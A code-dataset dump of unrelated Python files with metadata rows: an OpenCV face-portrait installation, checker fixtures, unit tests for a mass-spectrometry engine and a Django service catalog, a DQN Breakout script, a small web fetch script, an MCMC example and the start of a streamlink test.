    the vertical extent (height check). `factor` rescales coordinates.
    """
    ok_color = (100, 255, 100)
    fail_color = (100, 100, 255)
    segments = [
        (checked_frame.left_eye, checked_frame.right_eye, checked_frame.width_ok, 2),
        (checked_frame.centre, checked_frame.centre_target, checked_frame.centre_ok, 4),
        (checked_frame.h_min_point, checked_frame.h_max_point, checked_frame.height_ok, 2),
    ]
    for start, end, passed, width in segments:
        cv2.line(frame,
                 scale_point(start, factor),
                 scale_point(end, factor),
                 ok_color if passed else fail_color,
                 thickness=width)
def draw_triangles(frame, checked_frame, factor):
    """Draw a white Delaunay triangulation of the face landmarks onto `frame`.

    Landmarks outside the recognized frame are skipped; `factor` rescales
    the triangle vertices before drawing."""
    f_h, f_w, _ = checked_frame.recognized_frame.frame.shape
    # prep delaunay
    rect = (0, 0, f_w, f_h)
    subdiv = cv2.Subdiv2D(rect)
    for lm in checked_frame.recognized_frame.face_landmarks:
        if is_in_frame(f_w, f_h, lm):
            subdiv.insert(lm)
    print("triangles: {}".format(len(subdiv.getTriangleList())))
    for t in subdiv.getTriangleList():
        # each triangle comes back as a flat 6-vector; reshape to 3 (x, y) points
        t = np.reshape(t, (3, 2)).astype(np.int32)
        pt1 = scale_point(tuple(t[0]), factor)
        pt2 = scale_point(tuple(t[1]), factor)
        pt3 = scale_point(tuple(t[2]), factor)
        # draw the three edges in white, 1px, 8-connected
        cv2.line(frame, pt1, pt2, (255, 255, 255), 1, 8, 0)
        cv2.line(frame, pt2, pt3, (255, 255, 255), 1, 8, 0)
        cv2.line(frame, pt3, pt1, (255, 255, 255), 1, 8, 0)
def my_get_frame(video_capture, rotate):
    """Read one frame from `video_capture`; when `rotate`, transpose + flip it
    (a 90-degree rotation). Returns (success_flag, frame)."""
    rval, frame = video_capture.read()
    if not rotate:
        return rval, frame
    rotated = cv2.flip(cv2.transpose(frame), flipCode=1)
    return rval, rotated
class InteractiveDisplay:
    """Camera-driven installation loop: shows a live preview plus a generated
    portrait image, blending in well-positioned faces at timed intervals."""
    def __init__(self, camera_number, rotate, fullscreen, processing_backend):
        """Store configuration; no devices or windows are opened here (see init)."""
        self.camera_number = camera_number
        self.rotate = rotate
        self.fullscreen = fullscreen
        # debug view is half-size unless running fullscreen
        self.debug_scaling = 1/2
        if fullscreen:
            self.debug_scaling = 1
        # downscaling factor used for face detection
        self.scaling_factor = 4
        self.preview_window = "preview"
        self.genimage_window = "genimage"
        self.genimage = None
        self.video_capture = None
        self.collected_frames = []
        # processing backend that accumulates frames into the portrait
        self.pb = processing_backend
        self.current_checked_frames = []
        # earliest moment the portrait may next be updated
        self.checkpoint_time = datetime.datetime.now() + datetime.timedelta(seconds=10)
        self.frame_checker = None
        self.sound_player = SoundPlayer("bing.wav")
    def init(self):
        """Open the windows and webcam; grab an initial frame. Returns the
        capture success flag of that first read."""
        # initialize window
        cv2.namedWindow(self.preview_window, cv2.WINDOW_NORMAL)
        cv2.namedWindow(self.genimage_window, cv2.WINDOW_NORMAL) # WINDOW_NORMAL required for fullscreen to work
        if self.fullscreen:
            cv2.setWindowProperty(self.genimage_window, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
        # get webcam
        self.video_capture = cv2.VideoCapture(self.camera_number)
        # request 1920x1080 capture (props 3/4 = frame width/height)
        self.video_capture.set(3, 1920)
        self.video_capture.set(4, 1080)
        rval = False
        frame = None
        if self.video_capture.isOpened(): # try to get the first frame
            rval, frame = my_get_frame(self.video_capture, self.rotate)
        if frame is not None:
            self.genimage = scale_frame(frame, self.debug_scaling)
            cv2.imshow(self.genimage_window, self.genimage)
        # frame checker dimensions follow the (possibly rotated) orientation
        if self.rotate:
            self.frame_checker = FrameChecker(1080, 1920)
        else:
            self.frame_checker = FrameChecker(1920, 1080)
        return rval
    def teardown(self):
        """Close both windows and release the webcam."""
        cv2.destroyWindow(self.preview_window)
        cv2.destroyWindow(self.genimage_window)
        self.video_capture.release()
    def portrait_update(self, checked_frames):
        """Feed fully-passing frames into the backend; on a change, redraw the
        portrait window and push the next checkpoint 10 s into the future."""
        current_time = datetime.datetime.now()
        if current_time < self.checkpoint_time:
            print("too early")
            return # too early for an update
        # update portrait
        ok_frames = [cf.recognized_frame
                     for cf in checked_frames
                     if cf.all_ok]
        changed = False
        if ok_frames:
            print("Updating")
            self.sound_player.play()
            changed = self.pb.update(ok_frames)
        if changed:
            print("Updated")
            portrait_frame = self.pb.get_portrait()
            f = scale_frame(portrait_frame, self.debug_scaling)
            self.genimage = f
            cv2.imshow(self.genimage_window, self.genimage)
            self.checkpoint_time = current_time + datetime.timedelta(seconds=10)
        return changed
    def loop_update(self, frame):
        """Render one iteration: blend the live frame into the portrait view by
        the best face score, draw triangles past a threshold, then try a
        portrait update."""
        frame = scale_frame(frame, self.debug_scaling)
        new_preview = frame
        new_genimage = self.genimage
        current_time = datetime.datetime.now()
        if current_time > self.checkpoint_time and self.current_checked_frames:
            # draw face lines
            # blend weight = best score across the currently checked faces
            score = max([cf.total_score for cf in self.current_checked_frames])
            for cf in self.current_checked_frames:
                print("Score: {}".format(cf.total_score))
            new_genimage = cv2.addWeighted(self.genimage, 1 - score, frame, score, 0)
            # draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
            # draw_triangles(new_preview, self.current_checked_frames[0], self.debug_scaling)
            if score > 0.5:
                print("YO")
                draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
        # Display the resulting image
        cv2.imshow(self.preview_window, new_preview)
        cv2.imshow(self.genimage_window, new_genimage)
        cv2.waitKey(50)
        changed = self.portrait_update(self.current_checked_frames)
    def start(self):
        """Main capture loop: detect faces on every other frame, update the
        display, and exit on 'q' (or when the camera stops delivering)."""
        process_this_frame = True
        rval = True
        while rval:
            # get a single frame
            rval, frame = my_get_frame(self.video_capture, self.rotate)
            # TODO drop frames while processing
            # get the faces
            if process_this_frame:
                rfs = get_faces(frame, self.scaling_factor)
                self.current_checked_frames = [self.frame_checker.check(rf) for rf in rfs]
            process_this_frame = not process_this_frame
            self.loop_update(frame)
            # exit on ESC
            key = cv2.waitKey(20)
            if key == 113: # exit on q
                break
| 35.777202 | 113 | 0.634757 | 4,715 | 0.682839 | 0 | 0 | 0 | 0 | 0 | 0 | 575 | 0.083273 |
440da21df1681ee860c03c4cbe74d77afefdd093 | 253 | py | Python | tests/examples/simple.py | Tiendil/coulson | 6ce12f10731930bf6931f73b752976aeda839cc4 | [
"BSD-3-Clause"
] | null | null | null | tests/examples/simple.py | Tiendil/coulson | 6ce12f10731930bf6931f73b752976aeda839cc4 | [
"BSD-3-Clause"
] | null | null | null | tests/examples/simple.py | Tiendil/coulson | 6ce12f10731930bf6931f73b752976aeda839cc4 | [
"BSD-3-Clause"
] | null | null | null |
def assigned_type_mismatch():
    # Fixture: `x` is bound to an int and then rebound to a str on purpose --
    # presumably input for a static type-mismatch checker (verify against the
    # test suite before "fixing").
    x = 666
    x = '666'
    return x
def annotation_type_mismatch(x: int = '666'):
    # Fixture: the str default deliberately contradicts the `int` annotation --
    # this mismatch is the behavior under test; do not "fix" it.
    return x
def assigned_type_mismatch_between_calls(case):
    # Fixture: the type of `x` (int vs str) depends on `case`, so inferred
    # types differ between calls -- deliberate checker input; do not "fix".
    if case:
        x = 666
    else:
        x = '666'
    return x
| 12.65 | 47 | 0.588933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.059289 |
440e4fb77e7a2dcecc9229d9e1fe37a402ae6bf6 | 10,387 | py | Python | tests/test_dataset_manager.py | METASPACE2020/sm-engine | 01d214223b36d44ba63dd5b35a162b55094b4d27 | [
"Apache-2.0"
] | 3 | 2017-07-07T00:26:37.000Z | 2018-01-23T15:51:31.000Z | tests/test_dataset_manager.py | METASPACE2020/sm-engine | 01d214223b36d44ba63dd5b35a162b55094b4d27 | [
"Apache-2.0"
] | 8 | 2017-02-17T15:25:21.000Z | 2018-06-14T10:19:22.000Z | tests/test_dataset_manager.py | METASPACE2020/sm-engine | 01d214223b36d44ba63dd5b35a162b55094b4d27 | [
"Apache-2.0"
] | 2 | 2017-10-05T14:44:44.000Z | 2018-01-31T16:33:02.000Z | from unittest.mock import patch, MagicMock, call
import json
from datetime import datetime
from copy import deepcopy
import pytest
from PIL import Image
from sm.engine import DB, ESExporter, QueuePublisher
from sm.engine.dataset_manager import SMapiDatasetManager, SMDaemonDatasetManager
from sm.engine.dataset_manager import Dataset, DatasetActionPriority, DatasetAction, DatasetStatus
from sm.engine.errors import DSIDExists
from sm.engine.queue import SM_ANNOTATE, SM_DS_STATUS
from sm.engine.tests.util import pysparkling_context, sm_config, ds_config, test_db
from sm.engine.png_generator import ImageStoreServiceWrapper
@pytest.fixture()
def fill_db(test_db, sm_config, ds_config):
    """Seed the test database with one finished dataset, its job, a sum
    formula, and matching iso-image metrics rows."""
    upload_dt = '2000-01-01 00:00:00'
    ds_id = '2000-01-01'
    meta = {"meta": "data"}
    db = DB(sm_config['db'])
    # dataset row: FINISHED, public, HMDB-v4 / +H defaults
    db.insert('INSERT INTO dataset (id, name, input_path, upload_dt, metadata, config, '
              'status, is_public, mol_dbs, adducts) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
              rows=[(ds_id, 'ds_name', 'input_path', upload_dt,
                     json.dumps(meta), json.dumps(ds_config), DatasetStatus.FINISHED,
                     True, ['HMDB-v4'], ['+H'])])
    # one job (id 0) against mol db 0 for the dataset
    db.insert("INSERT INTO job (id, db_id, ds_id) VALUES (%s, %s, %s)",
              rows=[(0, 0, ds_id)])
    db.insert("INSERT INTO sum_formula (id, db_id, sf) VALUES (%s, %s, %s)",
              rows=[(1, 0, 'H2O')])
    # metrics row referencing two pre-existing iso image ids
    db.insert(("INSERT INTO iso_image_metrics (job_id, db_id, sf, adduct, iso_image_ids) "
               "VALUES (%s, %s, %s, %s, %s)"),
              rows=[(0, 0, 'H2O', '+H', ['iso_image_1_id', 'iso_image_2_id'])])
    db.close()
def create_ds_man(sm_config, db=None, es=None, img_store=None,
                  action_queue=None, status_queue=None, sm_api=False):
    """Build an API-side or daemon-side dataset manager for tests.

    Any collaborator left unset is replaced by a mock; ``db`` falls back to a
    real ``DB`` built from ``sm_config``.  ``sm_api=True`` yields an
    ``SMapiDatasetManager``, otherwise an ``SMDaemonDatasetManager``.
    """
    db = db or DB(sm_config['db'])
    es = es or MagicMock(spec=ESExporter)
    img_store = img_store or MagicMock(spec=ImageStoreServiceWrapper)
    action_queue = action_queue or MagicMock(QueuePublisher)
    status_queue = status_queue or MagicMock(QueuePublisher)
    if not sm_api:
        return SMDaemonDatasetManager(db=db, es=es,
                                      img_store=img_store, mode=None,
                                      status_queue=status_queue)
    return SMapiDatasetManager(db=db, es=es,
                               mode='queue', image_store=img_store,
                               action_queue=action_queue, status_queue=status_queue)
def create_ds(ds_id='2000-01-01', ds_name='ds_name', input_path='input_path', upload_dt=None,
              metadata=None, ds_config=None, status=DatasetStatus.NEW, mol_dbs=None, adducts=None):
    """Construct a ``Dataset`` test fixture, filling any unset field with a default."""
    return Dataset(ds_id, ds_name, input_path,
                   upload_dt or datetime.now(),
                   metadata or {},
                   ds_config or {},
                   status=status,
                   mol_dbs=mol_dbs or ['HMDB-v4'],
                   adducts=adducts or ['+H', '+Na', '+K'],
                   img_storage_type='fs')
class TestSMapiDatasetManager:
    """Tests for the API-side dataset manager, which publishes actions to a queue."""
    def test_add_new_ds(self, test_db, sm_config, ds_config):
        """add() publishes an ADD action message with HIGH priority."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        ds_man.add(ds, priority=DatasetActionPriority.HIGH)
        msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
               'action': DatasetAction.ADD, 'del_first': False}
        action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
    def test_delete_ds(self, test_db, sm_config, ds_config):
        """delete() publishes a DELETE action message with HIGH priority."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        ds_man.delete(ds)
        msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path', 'action': DatasetAction.DELETE}
        action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
    def test_update_ds__configs_equal_metadata_diff(self, fill_db, sm_config, ds_config):
        """update() publishes an UPDATE action when only the metadata changed."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        # same config as in the DB (fill_db), different metadata
        ds.metadata = {'new': 'metadata'}
        ds_man.update(ds)
        msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
               'action': DatasetAction.UPDATE}
        action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
    def test_update_ds__configs_metadata_equal__do_nothing(self, fill_db, sm_config, ds_config):
        """update() publishes nothing when neither config nor metadata changed."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        ds_man.update(ds)
        action_queue_mock.assert_not_called()
    def test_add_ds__new_mol_db(self, fill_db, sm_config, ds_config):
        """add() with changed databases publishes an ADD action at DEFAULT priority."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        ds.config['databases'] = [{'name': 'HMDB'}, {'name': 'ChEBI'}]
        ds_man.add(ds)
        msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
               'action': DatasetAction.ADD, 'del_first': False}
        action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.DEFAULT)])
    def test_add_optical_image(self, fill_db, sm_config, ds_config):
        """add_optical_image() stores one scaled copy per zoom level plus a thumbnail."""
        db = DB(sm_config['db'])
        action_queue_mock = MagicMock(spec=QueuePublisher)
        es_mock = MagicMock(spec=ESExporter)
        img_store_mock = MagicMock(ImageStoreServiceWrapper)
        # one generated image id per zoom level, then the thumbnail id
        img_store_mock.post_image.side_effect = ['opt_img_id1', 'opt_img_id2', 'opt_img_id3', 'thumbnail_id']
        img_store_mock.get_image_by_id.return_value = Image.new('RGB', (100, 100))
        ds_man = create_ds_man(sm_config=sm_config, db=db, es=es_mock,
                               img_store=img_store_mock, action_queue=action_queue_mock, sm_api=True)
        ds_man._annotation_image_shape = MagicMock(return_value=(100, 100))
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        zoom_levels = [1, 2, 3]
        raw_img_id = 'raw_opt_img_id'
        # identity transform matrix
        ds_man.add_optical_image(ds, raw_img_id, [[1, 0, 0], [0, 1, 0], [0, 0, 1]],
                                 zoom_levels=zoom_levels)
        assert db.select('SELECT * FROM optical_image') == [
            ('opt_img_id{}'.format(i + 1), ds.id, zoom)
            for i, zoom in enumerate(zoom_levels)]
        assert db.select('SELECT optical_image FROM dataset where id = %s', params=(ds_id,)) == [(raw_img_id,)]
        assert db.select('SELECT thumbnail FROM dataset where id = %s', params=(ds_id,)) == [('thumbnail_id',)]
class TestSMDaemonDatasetManager:
    """Tests for the daemon-side dataset manager, which executes the actions."""
    class SearchJob:
        """Minimal stand-in for the real search job; accepts and ignores everything."""
        def __init__(self, *args, **kwargs):
            pass
        def run(self, *args, **kwargs):
            pass
    def test_add_ds(self, test_db, sm_config, ds_config):
        """add() persists the dataset row in the database."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        es_mock = MagicMock(spec=ESExporter)
        db = DB(sm_config['db'])
        try:
            ds_man = create_ds_man(sm_config, db=db, es=es_mock, action_queue=action_queue_mock, sm_api=False)
            ds_id = '2000-01-01'
            ds_name = 'ds_name'
            input_path = 'input_path'
            upload_dt = datetime.now()
            metadata = {}
            ds = create_ds(ds_id=ds_id, ds_name=ds_name, input_path=input_path, upload_dt=upload_dt,
                           metadata=metadata, ds_config=ds_config)
            ds_man.add(ds, search_job_factory=self.SearchJob)
            DS_SEL = 'select name, input_path, upload_dt, metadata, config from dataset where id=%s'
            assert db.select_one(DS_SEL, params=(ds_id,)) == (ds_name, input_path, upload_dt, metadata, ds_config)
        finally:
            db.close()
    def test_update_ds(self, fill_db, sm_config, ds_config):
        """update() re-indexes the dataset in elasticsearch (delete then index)."""
        action_queue_mock = MagicMock(spec=QueuePublisher)
        es_mock = MagicMock(spec=ESExporter)
        ds_man = create_ds_man(sm_config, es=es_mock, action_queue=action_queue_mock, sm_api=False)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        with patch('sm.engine.dataset_manager.MolecularDB') as MolecularDB:
            mol_db_mock = MolecularDB.return_value
            mol_db_mock.name = 'HMDB'
            with patch('sm.engine.dataset_manager.MolDBServiceWrapper') as MolDBServiceWrapper:
                moldb_service_wrapper_mock = MolDBServiceWrapper.return_value
                moldb_service_wrapper_mock.find_db_by_id.return_value = {'name': 'HMDB-v4'}
                ds_man.update(ds)
                es_mock.delete_ds.assert_called_with(ds_id)
                # index_ds must have been called with both the ds id and the mol db
                call_args = es_mock.index_ds.call_args[1].values()
                assert ds_id in call_args and mol_db_mock in call_args
    def test_delete_ds(self, fill_db, sm_config, ds_config):
        """delete() removes iso images, the ES document and the DB row."""
        db = DB(sm_config['db'])
        action_queue_mock = MagicMock(spec=QueuePublisher)
        es_mock = MagicMock(spec=ESExporter)
        img_store_service_mock = MagicMock(spec=ImageStoreServiceWrapper)
        ds_man = create_ds_man(sm_config, db=db, es=es_mock, img_store=img_store_service_mock,
                               action_queue=action_queue_mock, sm_api=False)
        ds_id = '2000-01-01'
        ds = create_ds(ds_id=ds_id, ds_config=ds_config)
        ds_man.delete(ds)
        # ids inserted by the fill_db fixture
        ids = ['iso_image_{}_id'.format(id) for id in range(1, 3)]
        img_store_service_mock.delete_image_by_id.assert_has_calls(
            [call('fs', 'iso_image', ids[0]), call('fs', 'iso_image', ids[1])])
        es_mock.delete_ds.assert_called_with(ds_id)
        assert db.select_one('SELECT * FROM dataset WHERE id = %s', params=(ds_id,)) == []
| 45.358079 | 114 | 0.654472 | 7,313 | 0.704053 | 0 | 0 | 1,026 | 0.098777 | 0 | 0 | 1,517 | 0.146048 |
440ef0f506a9d49f97fe8b449ff8d92dc9b0a5ba | 2,492 | py | Python | tests/test_service_catalog/test_views/test_admin/test_settings/test_catalog/test_services/test_create.py | LaudateCorpus1/squest | 98304f20c1d966fb3678d348ffd7c5be438bb6be | [
"Apache-2.0"
] | 112 | 2021-04-21T08:52:55.000Z | 2022-03-01T15:09:19.000Z | tests/test_service_catalog/test_views/test_admin/test_settings/test_catalog/test_services/test_create.py | LaudateCorpus1/squest | 98304f20c1d966fb3678d348ffd7c5be438bb6be | [
"Apache-2.0"
] | 216 | 2021-04-21T09:06:47.000Z | 2022-03-30T14:21:28.000Z | tests/test_service_catalog/test_views/test_admin/test_settings/test_catalog/test_services/test_create.py | LaudateCorpus1/squest | 98304f20c1d966fb3678d348ffd7c5be438bb6be | [
"Apache-2.0"
] | 21 | 2021-04-20T13:53:54.000Z | 2022-03-30T21:43:04.000Z | from copy import copy
from io import BytesIO
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.urls import reverse
from service_catalog.models import Service
from tests.test_service_catalog.base import BaseTest
class ServiceCreateTestCase(BaseTest):
    """Admin view tests for creating a catalog service, with and without an image."""
    def setUp(self):
        super(ServiceCreateTestCase, self).setUp()
        self.url = reverse('service_catalog:create_service')
    def test_create_service(self):
        """POSTing a valid form creates exactly one new Service and redirects (302)."""
        data = {
            "name": "new_service",
            "description": "a new service",
            "job_template": self.job_template_test.id,
            "billing": "defined",
            "billing_group_id": "",
            "billing_group_is_shown": "on"
        }
        response = self.client.get(self.url)
        self.assertEqual(200, response.status_code)
        number_service_before = copy(Service.objects.all().count())
        response = self.client.post(self.url, data=data)
        self.assertEqual(302, response.status_code)
        self.assertEqual(number_service_before + 1,
                         Service.objects.all().count())
    def test_create_service_with_image(self):
        """POSTing multipart data with an uploaded JPEG stores the image on the service."""
        im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
        im_io = BytesIO() # a BytesIO object for saving image
        im.save(im_io, 'JPEG') # save the image to im_io
        im_io.seek(0) # seek to the beginning
        # wrap the buffer the way Django's upload handling expects it
        image = InMemoryUploadedFile(
            im_io, None, 'random-name.jpg', 'image/jpeg', len(im_io.getvalue()), None
        )
        data = {
            "name": "new_service_with_image",
            "description": "a new service",
            "job_template": self.job_template_test.id,
            "billing": "defined",
            "billing_group_id": "",
            "billing_group_is_shown": "on",
            "image": image
        }
        number_service_before = Service.objects.all().count()
        response = self.client.post(self.url, data=data, format="multipart")
        self.assertEqual(302, response.status_code)
        self.assertEqual(number_service_before + 1,
                         Service.objects.all().count())
        new_service_with_image = Service.objects.get(name="new_service_with_image")
        try:
            # accessing .file raises ValueError when no image was stored
            self.assertIsNotNone(new_service_with_image.image.file)
        except ValueError:
            self.fail("Image not set")
        # cleanup image after the test
        new_service_with_image.image.delete()
| 38.338462 | 85 | 0.628411 | 2,228 | 0.894061 | 0 | 0 | 0 | 0 | 0 | 0 | 537 | 0.21549 |
441052dc397931ac9f5e24e600272dbb4a1bb780 | 2,940 | py | Python | deep_q_tf/main_tf.py | murtazayusuf/Reinforcement_Learning | 42c81650c4ea87e430c8ff0620d70b0ec572977f | [
"Apache-2.0"
] | null | null | null | deep_q_tf/main_tf.py | murtazayusuf/Reinforcement_Learning | 42c81650c4ea87e430c8ff0620d70b0ec572977f | [
"Apache-2.0"
] | null | null | null | deep_q_tf/main_tf.py | murtazayusuf/Reinforcement_Learning | 42c81650c4ea87e430c8ff0620d70b0ec572977f | [
"Apache-2.0"
] | null | null | null | import gym
from dqn_tf import DeepQNetwork, Agent
import numpy as np
from gym import wrappers
def preprocess(observation):
    """Crop the top 30 rows off an Atari frame, grayscale it, add a channel axis.

    Assumes ``observation`` is a 210x160x3 RGB frame (so the crop leaves
    180*160 pixels for the reshape) -- TODO confirm against the env used.
    """
    cropped = observation[30:, :]
    grayscale = np.mean(cropped, axis=2)
    return grayscale.reshape(180, 160, 1)
def stack_frames(stacked_frames, frame, buffer_size):
    """Maintain a rolling buffer of the last ``buffer_size`` frames.

    On the first call (``stacked_frames is None``) the buffer is created and
    filled with copies of the current frame; otherwise the oldest frame is
    shifted out and the new one appended.  Returns an array of shape
    ``(1, height, width, buffer_size)`` ready to feed the network.
    """
    if stacked_frames is None:
        # BUG FIX: was 'frame.reshape' (a bound method) -- the shape is wanted.
        stacked_frames = np.zeros((buffer_size, *frame.shape))
        # BUG FIX: loop iterated the undefined name 'stacked_frame'.
        for idx, _ in enumerate(stacked_frames):
            # NOTE(review): frame[0] relies on broadcasting a single row across
            # the whole slot; confirm plain 'frame' was not intended here.
            stacked_frames[idx, :] = frame[0]
    else:
        stacked_frames[0:buffer_size-1, :] = stacked_frames[1:, :]
        stacked_frames[buffer_size-1, :] = frame[0]
    # BUG FIX: 'frames' was undefined; the spatial shape comes from 'frame'.
    stacked_frames = stacked_frames.reshape(1, *frame.shape[0:2], buffer_size)
    return stacked_frames
if __name__ == "__main__":
    env = gym.make("Breakout-v0")
    load_checkpoint = False
    agent = Agent(gamma=0.99, epsilon=1.0, alpha=0.00025, input_dims=(180, 160, 4),
                  n_actions=3, mem_size=3000, batch_size=32)
    if load_checkpoint:
        agent.load_models()
    scores = []
    numGames = 200
    stack_size = 400
    score = 0
    # Phase 1: fill the replay memory with random gameplay before learning.
    while agent.mem_cntr < 3000:
        done = False
        observation = env.reset()
        observation = preprocess(observation)
        stacked_frames = None
        observation = stack_frames(stacked_frames, observation, stack_size)
        while not done:
            action = np.random.choice([0, 1, 2])
            # env expects actions 1..3 while the agent works with 0..2
            action += 1
            observation_, reward, done, info = env.step(action)
            observation_ = stack_frames(stacked_frames, preprocess(observation_),
                                        stack_size)
            action -= 1
            agent.store_transition(observation, action,
                                   reward, observation_, int(done))
            observation = observation_
    print("Done with random gameplay, game on")
    # Phase 2: play and learn for numGames episodes.
    for i in range(numGames):
        done = False
        if i % 10 == 0 and i > 0:
            # BUG FIX: averaged the scalar 'score' (unsliceable float);
            # the rolling average must come from the 'scores' list.
            avg_score = np.mean(scores[max(0, i-10):(i+1)])
            print('episode', i, 'score', score, 'average_score %.3f' % avg_score,
                  'epsilon %.3f' % agent.epsilon)
            agent.save_models()
        else:
            print('episode: ', i, 'score ', score)
        observation = env.reset()
        observation = preprocess(observation)
        stacked_frames = None
        observation = stack_frames(stacked_frames, observation, stack_size)
        # NOTE(review): 'score' is never reset per episode, so it accumulates
        # across games -- confirm whether a per-episode reset was intended.
        while not done:
            action = agent.choose_action(observation)
            action += 1
            observation_, reward, done, info = env.step(action)
            observation_ = stack_frames(stacked_frames, preprocess(observation_),
                                        stack_size)
            action -= 1
            agent.store_transition(observation, action,
                                   reward, observation_, int(done))
            observation = observation_
            agent.learn()
            score += reward
        scores.append(score)
44155aabada0f13fedb7c839b6f8e15ee94c7153 | 327 | py | Python | gz.17zwd.com/17wang.py | zzh-python/all-project | 915a47fb42d63ff3a36814992283c2f4ed8703a3 | [
"Apache-2.0"
] | 58 | 2019-03-01T08:15:19.000Z | 2022-03-28T03:16:17.000Z | gz.17zwd.com/17wang.py | zzh-python/all-project | 915a47fb42d63ff3a36814992283c2f4ed8703a3 | [
"Apache-2.0"
] | 2 | 2020-06-08T08:07:46.000Z | 2020-11-02T11:48:05.000Z | gz.17zwd.com/17wang.py | zzh-python/all-project | 915a47fb42d63ff3a36814992283c2f4ed8703a3 | [
"Apache-2.0"
] | 37 | 2019-02-26T23:30:08.000Z | 2022-01-27T05:10:18.000Z | from bs4 import BeautifulSoup
import requests
import csv
import sys
from urllib.error import HTTPError
sys.path.append("..")
import mytemp
import time
import json
# Fetch the shop list for market 73 and dump the raw JSON response to disk.
url = 'https://gz.17zwd.com/api/shop/get-list/73'
resp = requests.get(url)
# BUG FIX: the file handle was opened with open() and never closed;
# a context manager guarantees the data is flushed and the handle released.
with open('17wang.txt', 'w+', encoding='utf-8') as f:
    f.write(resp.text)
print(resp.text)
4415a732b11d2612772f66097e011180e7139e5f | 1,722 | py | Python | extra/dream_examples/anticor.py | cyankaet/bumps | 427d077fd95f2d9a09eeb8677d045547061cff42 | [
"MIT"
] | 44 | 2015-03-28T06:48:43.000Z | 2022-01-09T11:29:00.000Z | extra/dream_examples/anticor.py | cyankaet/bumps | 427d077fd95f2d9a09eeb8677d045547061cff42 | [
"MIT"
] | 68 | 2015-08-21T11:28:54.000Z | 2022-03-30T22:14:13.000Z | extra/dream_examples/anticor.py | cyankaet/bumps | 427d077fd95f2d9a09eeb8677d045547061cff42 | [
"MIT"
] | 27 | 2015-06-22T19:25:27.000Z | 2021-06-15T18:20:06.000Z | #!/usr/bin/env python
"""
Example model with strong correlations between the fitted parameters.
We use a*x = y + N(0,1) made complicated by defining a=p1+p2.
The expected distribution for p1 and p2 will be uniform, with p2 = a-p1 in
each sample. Because this distribution is inherently unbounded, artificial
bounds are required on a least one of the parameters for finite duration
simulations.
The expected distribution for p1+p2 can be determined from the linear model
y = a*x. This is reported along with the values estimated from MCMC.
"""
from __future__ import print_function
from pylab import * # Numeric functions and plotting
from dream import * # sampler functions
# Create the correlation function and generate some fake data
# Create the correlation function and generate some fake data
x = linspace(-1., 1, 40)
# model: y = (p1 + p2) * x, so only the sum of the parameters is identifiable
fn = lambda p: sum(p)*x
# artificial bounds keep the otherwise unbounded parameters finite (see docstring)
bounds=(-20,-inf),(40,inf)
sigma = 1
data = fn((1,1)) + randn(*x.shape)*sigma  # Fake data
# Sample from the posterior density function
n=2
model = Simulation(f=fn, data=data, sigma=sigma, bounds=bounds,
                   labels=["x","y"])
sampler = Dream(model=model,
                population=randn(5*n,4,n),
                thinning=1,
                draws=20000,
                )
mc = sampler.sample()
mc.title = 'Strong anti-correlation'
# Create a derived parameter without the correlation
mc.derive_vars(lambda p: (p[0]+p[1]), labels=['x+y'])
# Compare the MCMC estimate for the derived parameter to a least squares fit
from bumps.wsolve import wpolyfit
poly = wpolyfit(x,data,degree=1,origin=True)
print("x+y from linear fit", poly.coeff[0], poly.std[0])
# discard the first half of the chain as burn-in (portion=0.5)
points,logp = mc.sample(portion=0.5)
print("x+y from MCMC",mean(points[:,2]), std(points[:,2],ddof=1))
# Plot the samples
plot_all(mc, portion=0.5)
show()
| 31.888889 | 76 | 0.699187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 931 | 0.54065 |
4415ff54efa6b8573163a01345a7d4c0fe9b4b4b | 542 | py | Python | tests/plugins/test_brittv.py | fuglede/streamlink | 2661d40164986f979edc2e6867f8daeceba73a44 | [
"BSD-2-Clause"
] | null | null | null | tests/plugins/test_brittv.py | fuglede/streamlink | 2661d40164986f979edc2e6867f8daeceba73a44 | [
"BSD-2-Clause"
] | null | null | null | tests/plugins/test_brittv.py | fuglede/streamlink | 2661d40164986f979edc2e6867f8daeceba73a44 | [
"BSD-2-Clause"
] | null | null | null | import unittest
from streamlink.plugins.brittv import BritTV
class TestPluginBritTV(unittest.TestCase):
